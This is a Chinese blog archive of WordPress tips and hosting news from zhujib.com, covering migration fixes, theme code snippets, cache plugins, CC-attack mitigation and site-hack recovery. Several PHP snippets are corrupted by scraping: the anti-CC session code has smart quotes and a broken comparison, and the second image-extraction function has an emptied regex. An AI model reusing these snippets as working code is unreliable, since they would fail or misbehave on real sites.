这个问题其实一直困扰我很久,因为按理说搬家是不存在文件目录权限问题,因为我们一般都是压缩包直接打包过来的,权限本身就写好了的。 不过还是被主机吧遇到了,在通过不断的检查后,我们恍然大悟。原来是新服务器创建的目录压根就不对。 原来服务器的上传目录是/www/wwwroot/zhujib.com/wp-content/uploads 也就是网站根目录是zhujib.com 但是主机吧在新服务器创建的时候用的是zhujib.com 所以才出现没有权限的情况,因为压根就没有www/wwwroot/zhujib.com这个目录 解决办法其实也简单,进入wordpress后台,设置,媒体,默认上传路径,修改为/www/wwwroot/zhujib.com/wp-content/uploads  直接把zhujib.com 目录换成自己新服务器的根目录即可。 至此,搬家完美完成!如你也遇到wordpress搬家错误的,可以留言一起探讨。 #### wordpress文章被复制的时候自动带链接 最近主机吧博客遇到一件很恶心的事情,辛辛苦苦写的文章被人给采集了!连标题都没改,想想自己辛辛苦苦写的文章被偷走了,而且对方居然收录比你好,你说气人不气人,所以主机吧在举报的同时也想查了一些防止被人采集的方法,总得来说都不大理想,比如说禁止复制之类的,对一个技术站来说,禁止复制是相当影响用户体验的,所以主机吧一直没弄。想了下在不影响用户体验的情况下,只有在文章被复制的时候自动加链接最为温和。方法很简单, 进入wordpress主题编辑器 找到functions.php函数模板文件,编辑,加入以下代码保存即可: function add_copyright_text() { if (is_single()) { ?> <script type='text/javascript'> function addLink() { if ( window.getSelection().containsNode( document.getElementsByClassName('entry-content')[0], true)) { var body_element = document.getElementsByTagName('body')[0]; var selection; selection = window.getSelection(); var oldselection = selection var pagelink = "<br /><br /> 阅读更多: <?php the_title(); ?> <a href='<?php echo get_permalink(get_the_ID()); ?>'><?php echo get_permalink(get_the_ID()); ?></a>"; //根据你的需要修改这行代码 var copy_text = selection + pagelink; var new_div = document.createElement('div'); new_div.style.left='-99999px'; new_div.style.position='absolute'; body_element.appendChild(new_div ); new_div.innerHTML = copy_text ; selection.selectAllChildren(new_div ); window.setTimeout(function() { body_element.removeChild(new_div ); },0); } } document.oncopy = addLink; </script> <?php } } add_action( 'wp_head', 'add_copyright_text'); #### wordpress显示:Briefly unavailable for scheduled maintenance. Check back in a minute解决办法 今天主机吧在后台把插件升级了下,结果网站出现:Briefly unavailable for scheduled maintenance. Check back in a minute.的显示。翻译成中文就是: 暂时无法进行定期维护。请稍后再来查看。 主机吧以为升级坏了,查询发现是因为程序在升级插件过程序中,无法正常升级导致的,要知道wordpress插件中心服务器是在海外的,国内访问偶尔会出现访问不了的情况。所以有时候我们要多尝试升级更新几次才会成功。 一直显示Briefly unavailable for scheduled maintenance. Check back in a minute.怎么办? 直接登陆网站服务器根目录,会出现一个文件 .maintenance,直接把他删了,再刷新下网页就正常了。   #### wordpress有哪些 缓存插件 WordPress 缓存插件概述 WordPress 缓存插件是一种提高网站性能的工具,它通过缓存网站内容并减少数据库查询次数来加快网页加载速度。这些插件通常将动态生成的WordPress页面转换为静态HTML文件,从而在后续访问时快速呈现给用户,减轻服务器负担并提高用户体验。 推荐的WordPress 缓存插件 搜索结果中推荐的WordPress缓存插件多样,这里根据提供的信息列出部分插件: WP Super Cache 这是WordPress官方维护开发的插件,非常受欢迎,有超过200万的安装量。WP Super Cache针对不同级别用户提供了不同配置选项,从简易到高级,可以满足不同需求。 WP Rocket WP Rocket是一款高级的WordPress缓存插件,虽然是收费产品,但以易用性和功能丰富性著称,非常适合既要求效率又缺乏技术背景的用户。 W3 Total Cache 一个功能丰富且能够带来显著性能提升的缓存插件,支持页面缓存、数据库缓存、对象缓存等多种优化手段。有些复杂的配置可供高级用户调整以获取最大性能。 LiteSpeed Cache 针对使用LiteSpeed服务器的网站提供缓存服务,具有自动页面缓存和清理功能,支持多站点配置,对WooCommerce有出色的兼容性。 Autoptimize 该插件主要专注于优化CSS、JavaScript和HTML,通过减少代码体积和提高前端文件的加载速度来加快网站响应时间。虽然它不仅仅是一个缓存插件,但有助于总体的性能提升。 Cachify Cachify优化页面加载速度,支持多种缓存方式如数据库、硬盘、Memcached或APC。根据设置的缓存策略,它能够显著减少数据库查询和PHP请求次数。 当你考虑使用WordPress缓存插件时,重要的是根据你的网站需求和服务器配置选择合适的插件。一些插件如WP Super Cache提供简单易用的配置,适用于初学者。而像W3 Total Cache这样的插件则提供了更为复杂的设置选项,适合有一定技术背景的用户。同时,对于例如WP Rocket这类付费插件,它们提供了额外的支持和高级功能,可以作为投资来提升网站性能。 #### WordPress极有可能放弃中国大陆市场 要说当前国际最热门事件当属中美国两国的经济冲突了,以往主机吧一度认为两个冲突对站长界不会有什么影响,不过看来这个想法有些天真了。 比如主机吧用的WordPress系统,去年WordPress就些某种原因屏蔽掉了中国大陆地区的访问,直到几个月前才恢复,这个影响还不算大,毕竟我们可以通过美国服务器访问。 而直到前几天WordPress5.5版本更新了,主机吧才发现WordPress5.5中文简体版的一直没有更新,而香港台湾版的都已经更新了,这是很不正常的,因为按照以往的经历即使中国大陆版的推迟几天,甚至一周两个周都是很正常的,像现在这样一个月了还没有更新简体版,以前是没有过的。 中文简体还是5.4.2版繁体版本的已经是最新的了   为什么主机吧认为对站长来说影响很大呢? 因为WordPress在全球有3分之一的网站采用他们的系统建站,而由于其开源漏洞也是很容易被人挖掘的,版本没有及时更新的话很大可能会被人利用旧版漏洞入侵,主机吧博客之前就是因为被人挂马了导致流量大降,只能重装过,及使是现在也不保证会不会有漏洞被人入侵。所以更新最新版才是王道。 但是目前WordPress的状态极可能放弃中国大陆了,或者某些原因延迟更新了,这影响很大的。 大家千万别想着更新语言版本哈,很大几率会出现错误的,群里有个朋友本来简体中文版的,后来更新了成美国版的,结果网站崩溃了,还好之前有备份,要不然网站就这样没了。 目前来说希望WordPress不是因为政治原因停更吧,如果是因为疫情原因延迟更新那是最好的。 其实国内很多计算机程序严重依赖美国,比如我们熟悉的PHP、MYSQL,甚至linux,windows,还有很多开源程序都是以美国公司组织主导的,如果美国哪天挂了,这些东西肯定也会停更的,停更后那些漏洞没法修复,就会使我们用他们东西的时候会非常不安全。当然这只是最差的结果,好的结果是有公司组织愿意接手他们的工作。 作为站长肯定主机吧是不希望中美国闹僵,只有合作才会共赢,美国很多东西是值得我们学习的,国内目前还不具备跟美国在计算机领域对抗的条件,各种方面都是,及时华为也是非常依赖美国的,只是普通人看不到就是了。   #### wordpress百度熊掌号改造教程 百度熊掌号目前是百度力推的一个有利于站长网站与百度结合的产品,主机吧有幸也通过了百度审核。不过通地审核还得把网站进行改造才可以正常展示。这边主机吧给大家做个教程,希望可以帮助大家。主机吧博客是以wordpress内核建的,所以用wordpress程序的应该很好操作。说是内页改造,其实就是在模板加几行百度熊掌号的代码而以。首先我们添加熊掌号ID声明,进入熊掌号页面改造地址http://ziyuan.baidu.com/xzh/commit/guide?appid=1539565510611342复制代码,然后进入wordpress后台,外观,编辑,找到header.php文件 在前加入代码即可查看是否增加生效 直接在首页右击,查看源码看是否显示增加的代码即可 增加声明后,再增加粉丝关注功能代码,这个功能是百度强烈推荐的,所以必须增加,关注功能可以增加到网页顶部,文章底部和文章段落间,主机吧选择网页顶部的方式,这样比较容易被关注。 还是跟之前一样,复制代码,然后进入wordpress后台,外观,编辑,找到header.php文件 在后加入代码即可完成后我们就可以实现手机访问显示关注功能了 然后我们添加熊掌号canonical标签,方法很简单进入外观,编辑,找到header.php,然后在前加入以下代码<?php if(is_single()){?> <link rel="canonical" href="<?php echo get_permalink($post->ID);?>"/> <?php } ?> 这个代码是特定在文章页显示的,我们进入文章内容页查看是代码是否生效 增加完canonical标签后再增加 添加JSON_LD数据,先进外观,主题,找到functions.php增加以下代码//获取文章/页面摘要 function fanly_excerpt($len=220){ if ( is_single() || is_page() ){ global $post; if ($post->post_excerpt) { $excerpt = $post->post_excerpt; } else { if(preg_match('/<p>(.*)<\/p>/iU',trim(strip_tags($post->post_content,"<p>")),$result)){ $post_content = $result['1']; } else { $post_content_r = explode("\n",trim(strip_tags($post->post_content))); $post_content = $post_content_r['0']; } $excerpt = preg_replace('#^(?:[\x00-\x7F]|[\xC0-\xFF][\x80-\xBF]+){0,0}'.'((?:[\x00-\x7F]|[\xC0-\xFF][\x80-\xBF]+){0,'.$len.'}).*#s','$1',$post_content); } return str_replace(array("\r\n", "\r", "\n"), "", $excerpt); } }   //优先获取文章中的三张图,否则依次获取自定义图片/特色缩略图/文章首图 last update 2017/11/23 function fanly_post_imgs(){ global $post; $content = $post->post_content; preg_match_all('/<img .*?src=[\"|\'](.+?)[\"|\'].*?>/', $content, $strResult, PREG_PATTERN_ORDER); $n = count($strResult[1]); if($n >= 3){ $src = $strResult[1][0].'","'.$strResult[1][1].'","'.$strResult[1][2]; }else{ if( $values = get_post_custom_values("thumb") ) { //输出自定义域图片地址 $values = get_post_custom_values("thumb"); $src = $values [0]; } elseif( has_post_thumbnail() ){ //如果有特色缩略图,则输出缩略图地址 $thumbnail_src = wp_get_attachment_image_src(get_post_thumbnail_id($post->ID),'full'); $src = $thumbnail_src [0]; } else { //文章中获取 if($n > 0){ // 提取首图 $src = $strResult[1][0]; } } } return $src; } 再到header.php文件之前添加经直代码即可完成JSON_LD数据添加。<?php if(is_single()){ echo '<script type="application/ld+json">{ "@context": "https://ziyuan.baidu.com/contexts/cambrian.jsonld", "@id": "'.get_the_permalink().'", "appid": "这里请填写熊掌号ID", "title": "'.get_the_title().'", "images": ["'.fanly_post_imgs().'"], "description": "'.fanly_excerpt().'", "pubDate": "'.get_the_time('Y-m-d\TH:i:s').'" }</script> ';} ?> 一切搞定,那么现在试试进入粉丝关注,在线校验工具,输入网址和相应网址的代码进入校验一切成功,到这里wordpress百度熊掌号改造就完成了,欢迎大家关注主机吧。 #### wordpress百度移动搜索结果出图改造方法 虽然百度熊掌号已经彻底凉了,不过百度熊掌号的一些功能还是被保留了下来,比如搜索结果出图功能,这个功能可以让百度移动搜索上展示网页的同时展示图片,可以增加点击率,很不错的功能。今天主机吧就来教大家wordpress是如何改造移动搜索结果出图的。首选我们进入wordpress后台,外观,编辑,找到functions.php增加以下代码//获取文章/页面摘要 function fanly_excerpt($len=220){ if ( is_single() || is_page() ){ global $post; if ($post->post_excerpt) { $excerpt = $post->post_excerpt; } else { if(preg_match('/ (.*)<\/p>/iU',trim(strip_tags($post->post_content," ")),$result)){ $post_content = $result['1']; } else { $post_content_r = explode("\n",trim(strip_tags($post->post_content))); $post_content = $post_content_r['0']; } $excerpt = preg_replace('#^(?:[\x00-\x7F]|[\xC0-\xFF][\x80-\xBF]+){0,0}'.'((?:[\x00-\x7F]|[\xC0-\xFF][\x80-\xBF]+){0,'.$len.'}).*#s','$1',$post_content); } return str_replace(array("\r\n", "\r", "\n"), "", $excerpt); } }   //优先获取文章中的三张图,否则依次获取自定义图片/特色缩略图/文章首图 last update 2017/11/23 function fanly_post_imgs(){ global $post; $content = $post->post_content; preg_match_all('//', $content, $strResult, PREG_PATTERN_ORDER); $n = count($strResult[1]); if($n >= 3){ $src = $strResult[1][0].'","'.$strResult[1][1].'","'.$strResult[1][2]; }else{ if( $values = get_post_custom_values("thumb") ) { //输出自定义域图片地址 $values = get_post_custom_values("thumb"); $src = $values [0]; } elseif( has_post_thumbnail() ){ //如果有特色缩略图,则输出缩略图地址 $thumbnail_src = wp_get_attachment_image_src(get_post_thumbnail_id($post->ID),'full'); $src = $thumbnail_src [0]; } else { //文章中获取 if($n > 0){ // 提取首图 $src = $strResult[1][0]; } } } return $src; } 再到header.php文件把以下代码添加至head>前即可完成。<?php if(is_single()){ echo '<script type="application/ld+json">{ "@context": "https://ziyuan.baidu.com/contexts/cambrian.jsonld", "@id": "'.get_the_permalink().'", "appid": "这里请填写熊掌号ID", "title": "'.get_the_title().'", "images": ["'.fanly_post_imgs().'"], "description": "'.fanly_excerpt().'", "pubDate": "'.get_the_time('Y-m-d\TH:i:s').'" }</script> ';} ?> 需要注意的是熊掌号ID在百度移动专区,站点资源管理,周级收录可以看到。 #### wordpress的s.w.org是什么?如何禁用? 用wordpress做网站的站长经常会遇到打开一卡一卡的,查询加载代码后,发现是网页加载了s.w.org链接。 很多人好奇s.w.org是做什么的,能不能去掉? 主机吧(zhujib.com)查了下,这个是wordprss为了更快打开网站而设计的,预先加载头像和表情,不过由于s.w.org是的服务器在国外,所以经常国内打经常卡卡的,甚至有时候打不开。 那我们要如何让wordpress禁用s.w.org呢? 给大家分享俩种禁用的方法 第一种: 将以下代码增加到主题文件functions.php模板中,保存即可 remove_action( 'wp_head', 'wp_resource_hints', 2 ); remove_action( 'wp_head', 'print_emoji_detection_script', 7 ); remove_action( 'wp_print_styles', 'print_emoji_styles' ); add_filter( 'emoji_svg_url', '__return_false' ); 第二种: 将以下代码增加到主题文件functions.php模板中,保存即可 function remove_dns_prefetch( $hints, $relation_type ) { if ( 'dns-prefetch' === $relation_type ) { return array_diff( wp_dependencies_unique_hosts(), $hints ); } return $hints; } add_filter( 'wp_resource_hints', 'remove_dns_prefetch', 10, 2 ); remove_action( 'wp_head', 'print_emoji_detection_script', 7 ); remove_action( 'wp_print_styles', 'print_emoji_styles' ); add_filter( 'emoji_svg_url', '__return_false' ); #### WordPress紧跟时代,引入 AI 助手,可撰写博文、纠正语法、翻译内容 6 月 8 日消息,Automattic 公司近日宣布,为其 WordPress 新增 AI 写作助手-- Jetpack AI Assistant,可以根据用户的提示,撰写博文、详情页、结构化列表和表格。 Jetpack AI Assistant 支持非正式、乐观、正式、幽默、怀疑等多种口吻来创作内容,兼容现有集成 Jetpack 的网站。 Automattic 表示,Jetpack AI Assistant 还可以将内容翻译成中文、法语和印地语等 12 种语言。该工具可以为博客文章建议标题和摘要,并提供一种对话模式,它可以兼作聊天机器人。 Jetpack AI Assistant 当前处于实验阶段,仅满足用户 20 次请求,之后用户使用需要支付 10 美元的月费。 #### wordpress编辑器如何复制粘贴导入word文件 之前一客户给主机吧发搞的时候由于发的是word文件,如果直接在wordpress编辑器里复制粘贴word的文件内容肯定是行不通的,这样不仅会失去格式,而且图片内容也是没办法粘贴过来的,怎么办?网上搜了下,还真有解决办法。 在Wordpress官网上下载Mammoth .docx converter插件,下载地址:https://wordpress.org/plugins/mammoth-docx-converter/ 进入自己的网站后台,点击左侧菜单的【插件】-【安装插件】-选择自己下载的Mammoth .docx converter 插件; 安装好插件之后,我们在发布文章时,编辑器的下方就会多出如下图所示的文件上传字段。  点击上图中的“选择文件” 按钮,选择我们需要导入到 WordPress 的 WORD文档,必须是docs文档。文件上传完毕后,我们会看到下面的界面。  点击“Insert into editor”按钮,就可以把转换后的 HTML 内容插入到 WordPress 的文章编辑器了。 导入之后,我们可以根据需要对文章的内容和样式进行一些微调。 注意事项 需要注意的是、并不是所有的 Word 内容格式都会被导入到 WordPress 中、目前 “Mammoth .docx converter”插件支持以下几种 Word 内容样式。 内容标题:标题1、标题2、等等 有序列表和无序列表 Word 中的表格,在导入时,表格的背景和边框颜色等样式会被忽略掉 字体加粗、斜体、上表、下表等基本的文章格式 Word 中插图的图片将被导入到 WordPress 中 文字中插入的链接 Word 中的文本框将被导入为纯文本 #### WordPress网站惨遭恶意挂马 WordPress毫无疑问是全球最受欢迎的博客CMS程序,可以开发成企业网站、个人博客、商城、新闻网站等,不过由于其是开源程序漏洞BUG自然也是挺多的,这不本月众多WordPress 网站被曝:惨遭黑客入侵并恶意植入代码,数以万计的网站被感染,但攻击手法还不是 WordPress CMS 本身的bug,而是利用过时的主题和插件中存在的漏洞。恶意代码是怎么进一步作恶的呢?它会把曾访问过受感染网站的用户,筛选出来,并将用户重定向到技术支持的诈骗网站。例如:利用 Google Chrome 的 “evil cursor” 漏洞,阻止用户关闭恶意网站。WordPress 网站劫持这个月就出现了苗头,尤其最近几天感染的Wordpress网站数量不断递增。谷歌中搜索结果发现,攻击的 JavaScript 恶意代码多达2,500多条,这其中只占攻击网站总数的一小部分。所以大家千万别在乱下载网站的免费主题或者插件了,最好是购买那些商业主题,花几百块钱终身维护的,像主机吧主题就是花钱买的。价格不算贵,相对于一些自助建站系统来说简直便宜得很。 #### WordPress自动更新失败 如何手动更新 不知道大家有没有遇到WordPress自动更新失败的问题,由于WordPress官方网站国内连接慢卡等原因,国内服务器更新最新版的WordPress是经常失败的。 主机吧就遇到想更新WordPress 5.3,结果连续三天没更新成功,这个时候我们就需要自己手动更新了。在网上找了一圈,这边提供一个演示手动更新教程给大家。 一,进入wordpress后台,点击更新 二、点击下载WordPress最新版 有时候国内访问官网可能会出现429 Too Many Requests,这是因为国内访问过于繁忙导致的,大家可以等过段时间再访问。 三、下载得到最新版压缩包后,解压出来,并删掉文件夹中的wp-content目录 四、然后把删除后的wordpress文件夹上传覆盖至网站主机上   五、上传完成后,在浏览器里面运行:https://你的博客地址/wp-admin/upgrade.php,回车访问,执行升级,点击继续升级数据库,升级完成即可。 六、登陆后台查看是否更新版本 #### wordpress被CC怎么办?wordpress如何防御CC攻击? wordpress作为目前全球流行度最高的程序,其功能强大,扩展性强,不过也是由于功能强大,其运行其它非常的肿,特别容易被CC攻击导致无法运行。 要解决被CC问题,主机吧整理了一些方法给大家。 1.安装缓存插件 给网站装WP Super Cache与Redis Object Cache插件,其中WP Super Cache是缓存网页内容的,可以把wordpress的动态网页生成纯静页,这样动态请求就会大量减少,从而减小服务器负担。 而Redis Object Cache是针对数据库的,可以把数据库请求缓存至服务器内存上,大量减少了CPU的压力,对于一些服务器配置CPU低,内存高的,非常适合。至于这两个插件怎么安装的问题大家自行百度啦,这边就不多说了。 2.给PHP放代码 原理是对每个IP访问进行访问限制,超出相应的值后,就会反回404页,对于小型CC攻击是有用处的,但对于有大量IP的攻击来说无用,而且主机吧不清楚用了这个代码对搜索引擎是否有影响,大家看着来弄吧。 //防止CC攻击 session_start(); //开启session $timestamp = time(); $ll_nowtime = $timestamp ; //判断session是否存在 如果存在从session取值,如果不存在进行初始化赋值 if ($_SESSION){ $ll_lasttime = $_SESSION[‘ll_lasttime’]; $ll_times = $_SESSION[‘ll_times’] + 1; $_SESSION[‘ll_times’] = $ll_times; }else{ $ll_lasttime = $ll_nowtime; $ll_times = 1; $_SESSION[‘ll_times’] = $ll_times; $_SESSION[‘ll_lasttime’] = $ll_lasttime; } //现在时间-开始登录时间 来进行判断 如果登录频繁 跳转 否则对session进行赋值 if(($ll_nowtime – $ll_lasttime) =5){ header(“location:http://127.0.0.1”);//可以换成其他链接,比如站内的404错误显示页面(千万不要用动态页面) exit; } }else{ $ll_times = 0; $_SESSION[‘ll_lasttime’] = $ll_nowtime; $_SESSION[‘ll_times’] = $ll_times; } 将代码放functions.php中即可 3.给网站装云防火墙 如果上面两种方法没有解决的,那我们只能花钱买防御了,给网站装高防CDN或者高防IP,也就是云防,这类防御是收费的,而且往往价格并不便宜。以阿里云WAF防火墙为例,最低版的一个月也要38000,当然我们不需要用这么好的,我们可以用百度云加速CDN防御,一个专业版代理价也就880元一年,开启强力防护后可以做到无视CC攻击,而且可以隐藏源服务器IP,从而天然保护了服务器被DDoS的风险。 好了,以上就是主机吧对wordpress防御CC攻击的一些经验,如果你遇到攻击无法解决的也可以联系我们,我们来给你找防御方案。 #### wordpress被CC攻击利用百度云加速安全防护策略 CC攻击很多站长都遇到,网站稍有些流量的多多少少都会遇到攻击,实在是攻击成本太低,远远比不上防护成本。一但防护不了网站很可能面临网站关闭的损失。主机吧之前做过一个QQ资源站就是因为被攻击关闭的。所以如何有效并最便宜的防护CC攻击是今天主机吧想要说的主题。这里以常用程序wordpress为例:我们都知道CC攻击主要是通过大量请求网页上的动态程序,导致服务器CPU内存超标,从而打不开。那么我们可以根据这样原来,把 wordpress页面设置成静态页,这样可以减少请求,服务器自然也没什么问题。如何设置静态页呢?1.安装 WP Super Cache 插件这个插件可以把网页上的页面全部生成缓存静态页,从而实现减少服务器动态请求。2.百度云加速全站缓存安装WP Super Cache 插件还不够,因为这个插件只缓存了前台页面,而那些后台登陆等页面是不会缓存的,我们需要给网站设置解析百度云加速进行全站缓存。接入百度云加速后点查看报表下拉的规则自定义添加wordpress后台不缓存规则,以免因缓存登不上后台。设置如下:域名:https://zhujib.com/wp-admin/*(*号表示这个域名后的任意后缀)缓存粒度:不缓存浏览器缓存有效期:2小时永久在线:开启 图片延迟加载:开启 参数排序:开启 加速 :关闭(这个功能开启后网站容易出错,保险起见还是关闭了)通用安全设置:开启CC防护:强力防护(这个一定要开,强力防护模式可以有效防护CC攻击,免得对方攻击你后台地址)浏览器检查:开启(主要是限制非浏览器访问)添加域名全站缓存设置如下:域名:zhujib.com/*(*号表示这个域名后的任意后缀)缓存粒度:所有都缓存节点缓存有效期:1小时浏览器缓存有效期:小时永久在线:开启 图片延迟加载:开启 参数排序:开启 加速 :关闭(这个功能开启后网站容易出错,保险起见还是关闭了)通用安全设置:开启CC防护:高浏览器检查:关闭(主要是限制非浏览器访问)完成设置提交后,等10分钟后,全站就缓存了,缓存后你会看到服务器的CPU和内存大量降下来。以上就是主机吧对wordpress防护策略的理解,希望可以帮助大家。 #### wordpress装redis速度更慢了 最近有在研究怎么优化wordpress速度,看到很多站长都在发PHP安装redis,wordpress安装redis插件的方案。 主机吧也照着做了一下,发现网页的请求确实少了,但是奇怪的事,感觉速度并没有得到提升,甚至可以说更慢了,特别是动态请求的时候,感觉慢得一批,wordpress内置搜索要3秒以上,而以前1秒左右就可以开了。后来查询服务器后,发现redis运行的时候占用带宽特别高,主机吧的服务器20M独享的,但是一运行redis后,偶尔会跑到30M去,造成卡顿严重,关掉redis后,宝塔后台下载带宽运行不到100KB。 而且主机吧发现启用,第二天百度索引量就大降了,不知道什么情况。 主机吧查询发现这些网上这些优化方案都是好多年前的资料了,很多博主都是转载了又转载,自己根本没有试验过,而且现在PHP已经更新到8.0了,很多过时的扩展根本不适合使用,还有wordpress也做了很多更新优化,所以我认为redis已经不适合wordpress了,装了后不仅慢,甚至并发也不如没装好。 目前最好的方法优化方法是更新最新版wordpress+PHP7.4+CDN+WP Super Cache 缓存插件,其它的作用都不大。主机吧目前这是这个组合,感觉速度不错。 #### WordPress迎来18岁生日 全球超过40%网站使用WordPress 日前 WordPress 官方博客发布博文,庆祝该软件迎来18岁生日。18年前的5月27日,一篇名为《WordPress Now Available》的博文开启了博客圈历史上一个激动人心的时代,WordPress 作为被抛弃的 b2/cafelog 软件的非官方继承者出现。 在这篇文章的评论中,你可以感受到这个新产品的魅力。当时,很多忠实的 b2用户为能顺利迁移到一个将被维护的新的博客引擎而感到兴奋。 WordPress 社区获得了从 b2继承的许可授权,使它成为今天的强大的 CMS。WordPress 现在支撑着一个由创作者、出版商和商人组成的数十亿美元的经济,他们可以用 GPL 许可的扩展世界建立几乎任何东西。WordPress 的充满活力的生态系统已经发展到包括58,000多个免费插件来扩展核心,以及成千上万的商业插件和服务,包括专门为其用户服务的托管公司。 即便是没有任何编程经验的人,WordPress 都能让他们快速搭建自己的网站。现在它在电子商务方面也发挥了作用,为企业和独立商店促进了数十亿美元的销售。由于传统的实体企业被迫关门,这场大流行为由WordPress驱动的商店创造了前所未有的成功机会。 尽管在过去一年中经历了一些深刻的、千载难逢的挑战,WordPress 仍然以惊人的速度增长。2月,根据W3Techs的测量,该内容管理系统在所有网站中的市场份额超过了40%,高于2020年1月的35.4%。WordPress的项目负责人和联合创始人马特-穆伦维格(Matt Mullenweg)在他的博客上的一篇文章中指出了这个里程碑,纪念18周年。 #### WP Engine 争议事件后续:Linux 基金会推出 FAIR 项目,旨在打造去中心化 WordPress 生态 6月9日消息,Linux基金会于6月6日宣布启动名为 FAIR Package Manager (FAIR) 的新项目,旨在为WordPress创建一个去中心化的插件与主题生态系统。该项目意图将控制权交还给网站托管服务商和开发者,被广泛视为对近期WP Engine与Automattic之间争议事件的直接回应。 项目核心功能: FAIR被设计为一款即插即用的WordPress插件,能够无缝替代现有依赖WordPress.org API的集中式服务架构。 虽然初期版本仍将使用WordPress.org的镜像服务分发稳定插件,但后续计划将全面转向原生支持FAIR格式的插件与主题套件。 部署方式:托管服务商可通过两种途径部署FAIR系统: 独立插件: 提供可直接安装在现有WordPress站点上的FAIR插件。 官方发行版: 通过预装FAIR的官方发行版实现网站的自动部署。 项目背景:争议与社区反响FAIR项目的推出与WP Engine和Automattic的商标纠纷密切相关。作为WordPress核心开发主力及WordPress.com的运营方,Automattic在2024年曾要求同为托管服务商的WP Engine支付商标授权费。在要求被拒后,Automattic创始人Matt Mullenweg于2024年9月单方面禁止了WP Engine访问WordPress.org插件平台,并在同年10月直接分叉(fork) 了由WP Engine维护的知名插件ACF(Advanced Custom Fields)。 这一系列事件引发了WordPress社区的广泛质疑。尽管WordPress.org名义上归属社区所有,是官方的代码、文档及插件主题分发中心,但争议暴露了Automattic及Mullenweg对平台拥有高度控制权。许多社区成员认为此举违背了开源精神。据报道,此次风波还导致了Automattic内部动荡,约159名员工离职。 #### WPS Office存在代码执行漏洞,可通过该漏洞控制其电脑 8 月 11 日消息,WPS 近日发布安全通告,确认 WPS Office 存在代码执行漏洞,建议用户更新到最新版本。 WPS 官方称,攻击者利用本漏洞专门构造出恶意文档,受害者打开该文档并执行相应操作后,才会联网从远程服务器下载恶意代码到指定目录并执行,前提是系统当前用户对该目录具备写权限,攻击者进而控制其电脑。 影响范围: WPS Office 个人版,Windows 平台,版本号低于 12.1.0.15120(含) WPS Office 机构版本(如专业版、专业增强版),Windows 平台,版本号低于 11.8.2.12055(含) 如果用户在使用 WPS Office 个人版,可以通过 WPS 官网获取最新版本进行升级;如果用户在使用 WPS office 机构版本(如专业版、专业增强版),可以联系专属客户经理或官方人员获取最新版本。 #### wps崩了 2024年1月5日,WPS办公软件遭遇了一次服务故障,这导致了用户无法正常登录和使用该应用程序。这次服务故障使“WPS崩了”迅速登上微博热搜,引起了广泛的关注和讨论。用户们反馈的主要问题包括无法正常登录应用程序,以及文件保存不稳定等问题。 官方回应和修复进程 对于这次服务故障,WPS官方通过微博进行了回应,他们表示已经注意到服务故障问题,并正在紧急进行排查和修复。官方的声明中暂时未说明具体的故障原因,但承诺正在努力解决问题并向受影响的用户道歉。客服也对外表示,正逐步恢复相关服务,并对用户的不便表示歉意。 用户的反馈和期待 从用户的反馈来看,WPS崩溃给许多依赖该软件的用户造成了不小的困扰,特别是在数字化办公环境下,对实时处理文档的需求相当紧迫。虽然用户们对WPS官方的回应表示理解,但同时也希望服务能够尽快恢复正常,并对可能的损失表示关切。 结论 总结而言,WPS软件的崩溃引起了用户和媒体的广泛关注。WPS官方及时做出了回应,并承诺正在解决问题。用户在等待服务恢复的同时,也期待得到关于故障原因和避免未来类似事件的更多信息。目前,恢复进程正在进行中,而具体的故障原因尚待官方后续给出详细说明。 #### wp站点 经常被黑,被劫持怎么办? 最近,有小伙伴的wordpress网站被黑,跳转了非法链接。 由于主机邦一直都是用wordpress,之前也遇到这类问题,今天主机邦就来谈谈如何解决。 首先,遇到被黑不要慌,一般是网站存在某个漏洞导致的。 我们先操作: 1.先恢复之前备份 如果你的网站之前有无毒的备份,可以先恢复之前的备份,如果没有看下条。 2 更换上传更新最新版的wordpress的 到wordpress下载最新的版本,然后手动上传更新,这样做可以恢复绝大多数已被入侵的情况,如何手动更新wordpress,看链接。 3 卸载掉可能有漏洞的插件 wordpress本身虽然不能说最安全,但安全程度绝对吊打市面上99%的软件,而wordpress最容易被入侵的地方是插件模块,一些插件含有漏洞,后门,是黑客入侵wordpress的主要门路,解决办法是卸载到这些可能有后门的插件。 4 安装WEB应用防火墙 现在做网站一定要给网站安装WEB应用防火墙,原因是现在的自动化程序太厉害了。这些自动化程序每天不停的扫描互联网上的网站,哪怕是你的网站本身没什么流量,也没怎么推广,都会被扫到,扫到漏洞后,就会上报黑客,然后进行入侵,你的网站不知不觉就成了别人赚钱的工具了。 解决办法是装WEB应用防火墙,WEB应用防火墙不仅可以拦截市面上99%的安全漏洞,还可以自定义访问策略,可针对一些自定化软件进行限制访问。我们推荐使用百度云防护,其它不仅支持安全漏洞防御,还支持DDOS、CC攻击防御,企业版还支持bot防护,可有效针对恶意爬虫等攻击,有效解决网站安全问题。 详细可了解下:https://zhujib.com/shop/26864.html #### X-Forwarded-For防伪造指南:如何通过请求头过滤伪造IP流量 以下是一些可以获取真实 IP 的请求头及相关说明: X-Forwarded-For :是一个常见的请求头,用于识别经过代理服务器后原始客户端的 IP 地址。其值是一个逗号分隔的 IP 地址列表,第一个 IP 地址通常是客户端的真实 IP,后续 IP 地址则是请求经过的代理服务器的 IP。例如,X-Forwarded-For: client1, proxy1, proxy2,其中 client1 是原始客户端的 IP,proxy1 和 proxy2 分别是中间代理服务器的 IP 地址。但需要注意,X-Forwarded-For 头信息可被客户端伪造,因此在使用时需进行验证,如仅信任来自特定可信代理的该头信息。 X-Real-IP :该请求头用于传递客户端的真实 IP 地址,与 X-Forwarded-For 不同,X-Real-IP 通常由反向代理服务器如 Nginx 设置,客户端无法直接修改它,从而提高了安全性。一般只包含一个 IP 地址,表示原始客户端的 IP。不过,如果存在多级代理,且后面的代理也设置了 X-Real-IP,则会覆盖前面的值,所以需在第一个代理服务器上正确设置该头信息,并确保后续代理不对其进行篡改。 True-Client-IP :是 Cloudflare 提供的一个请求头,用于获取客户端真实 IP 地址。当网站所有流量都通过 Cloudflare 过滤时,可使用此头来获取用户的真实 IP,其优先级高于 X-Forwarded-For。 CF-Connecting-IP :也是 Cloudflare 提供的用于获取真实 IP 的请求头字段,当 Cloudflare 的代理服务器与客户端建立连接时,会将客户端的真实 IP 地址放入此字段。 X-Cluster-Client-IP :有些应用程序服务器或中间件在经过负载均衡或集群环境后,可能会使用该请求头来传递客户端的真实 IP 地址。 X-Forwarded :其值通常是一个逗号分隔的列表,包含了客户端 IP 地址以及请求经过的中介服务器的 IP 地址,格式与 X-Forwarded-For 类似,可用于获取客户端真实 IP,但同样可能存在伪造风险。 X-Forwarded-Host :可用来传递原始请求中的 Host 